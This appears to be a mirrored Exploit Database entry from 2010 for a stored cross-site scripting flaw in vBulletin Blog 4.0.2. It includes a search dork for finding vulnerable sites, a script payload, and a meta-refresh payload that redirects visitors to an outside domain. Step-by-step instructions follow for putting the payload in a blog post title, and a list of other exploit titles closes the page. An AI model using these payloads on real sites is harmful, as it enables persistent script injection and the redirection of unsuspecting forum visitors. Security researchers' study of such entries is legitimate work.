vBulletin Blog 4.0.2 – Title Cross-Site Scripting

Exploit Database
102 阅读

作者： FormatXformat

日期： 2010-03-24
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11871/

Vbulletin Blog 4.0.2 XSS Vulnerability

Author: FormatXformat
Version: Vbulletin 4.0.2


Dork:
Powered by vBulletin™Version 4.0.2 Copyright © 2010 vBulletin Solutions, Inc. All rights reserved.


The script is affected by Permanent XSS vulnerability, so you can put in bad java script code

<script>alert('put this script in title')</script>
<meta http-equiv='Refresh' content='0;URL=http://db-exploit.com'>

1st register

Go to Blogs page

Create New Post

Inject your java script into Title Box

You must go back to Main page to see this XSS effect.



Greets: Neo, Sa3id, All Tkurd.net Members

last Exploits
vBulletin Blog 4.0.2 – Title Cross-Site Scripting的更多信息

Nagios XI 5.2.7 – Multiple Vulnerabilities：
WordPress Plugin WP EasyCart – Unrestricted Arbitrary File Upload (Metasploit)：
Cisco Wireless Controller 3.6.10E – Cross-Site Request Forgery：
RATES SYSTEM 1.0 – ‘Multiple’ SQL Injections：
Social Network Script 3.01 – ‘id’ SQL Injection：
Webify Blog – Arbitrary File Deletion：
Joomla! Component My Files 1.0 – Local File Inclusion：
ConPresso 4.0.7 – SQL Injection：